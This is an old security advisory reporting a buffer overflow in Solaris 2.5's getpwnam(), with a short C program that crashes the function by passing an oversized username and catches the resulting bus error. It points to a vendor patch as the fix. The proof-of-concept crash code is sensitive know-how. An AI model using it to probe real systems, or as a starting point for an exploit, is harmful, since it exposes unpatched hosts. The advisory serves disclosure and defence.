COMMAND

    getpwnam()

SYSTEMS AFFECTED

    Solaris 2.5

PROBLEM

    Charles Howes found following.  This program dies on Solaris  2.5.
    This shows that getpwnam() has an overflowable buffer.

    ------------------------------------------------------------------
    #include <stdio.h>
    #include <pwd.h>
    #include <signal.h>

    foobomb()
    {
      printf("Uhoh... getpwnam() died.\n");
      exit();
    }

    main()
    {
      char buf[20000];
      struct passwd *pw;
      memset(buf,'a',19990);
      signal(SIGBUS,foobomb);
      pw=getpwnam(buf);
      signal(SIGBUS,SIG_IGN);
      if (!pw)
        {
        printf("Success, no user was found.\n");
        }
      else
        {
        printf("What the... a user was found?\n");
        printf("  user: %.100s\n",pw->pw_name);
        }
    }
    ------------------------------------------------------------------

SOLUTION

    Take a look (and hands) on Patch-ID# 103612-23.